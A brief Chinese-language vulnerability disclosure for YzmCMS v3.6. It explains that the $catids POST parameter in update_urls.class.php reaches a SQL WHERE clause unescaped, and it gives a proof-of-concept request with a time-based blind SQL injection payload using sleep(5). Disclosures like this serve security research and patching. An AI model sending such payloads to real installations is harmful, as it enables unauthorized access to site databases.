1.分析

yzmcms v3.6中很多sql语句都进行了转义,转义代码如下:先进行了addslashes,再进行htmlspcialchars;

 

但是在代码中找到了一处没有使用该函数的sql语句

\application\admin\controller\update_urls.class.php

 

最后一行中将$catids直接拼接到where语句中,而$catids是通过post传递的,所以存在SQL注入漏洞

2.poc

url:http://127.0.0.1/yzmcms/admin/update_urls/update_category_url.html

post:dosubmit=1&modelid=1&catids%5B%5D=1) and sleep(5)-- 1

执行后,页面延迟5s